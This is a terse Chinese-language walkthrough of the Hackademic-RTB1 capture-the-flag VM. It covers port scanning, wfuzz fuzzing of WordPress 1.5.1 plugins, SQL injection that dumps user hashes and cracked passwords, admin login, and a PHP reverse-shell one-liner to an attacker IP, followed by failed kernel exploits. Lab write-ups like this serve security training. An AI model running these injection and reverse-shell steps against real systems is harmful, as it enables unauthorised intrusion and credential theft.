Hackademic-RTB1
一、nmap
扫全端口会爆炸,暂时使用默认先扫描出两个
二、web渗透
随便看看
简单目录爆破
/Hackademic_RTB1/
根据界面提示,我们可以来到这个目录
源码处发现框架
再次目录爆破
wscan扫描
WordPress 1.5.1
searchsploit
/wp-content/plugins/
在目录爆破中发现插件目录,这边尝试通过插件进行渗透
wfuzz
好像都没有东西
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/hello.php?FUZZ=somethings
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/textile1.php?FUZZ=somethings
sudo wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.126.215/Hackademic_RTB1/wp-content/plugins/markdown.php?FUZZ=somethings
好像思路都走不通了,我们往回走看看是不是遗漏了什么东西
/Hackademic_RTB1/?p=9
通过点击Got root?!
,我们来到了一个新的界面,看url就明白了
sql注入
p参数
没注入,不会吧
cat参数
通过点击Uncategorized,发现有又一个新的界面
确定存在sql注入了
这里是靶场,就直接dump出来咯,实战中可别这样做
NickJames 21232f297a57a5a743894a0e4a801fc3 (admin)
GeorgeMiller 7cbb3252ba6b7e9c422fac5334d22054 (q1w2e3)
目录扫描尝试登入后台
成功
这个用户登入进去,发现能做的操作很少,尝试换其他用户登入,GeorgeMiller:q1w2e3
尝试php反弹shell
通过刷新hello.php,还是无法连接
php -r '$sock=fsockopen("192.168.126.201",11111);exec("/bin/sh -i <&3 >&3 2>&3");'
添加上传文件白名单
拿下webshell
三、内网渗透
计划任务
查看版本情况
尝试内核提权漏洞
失败1
失败2
失败3
失败4
由于版本问题通杀提权也失败了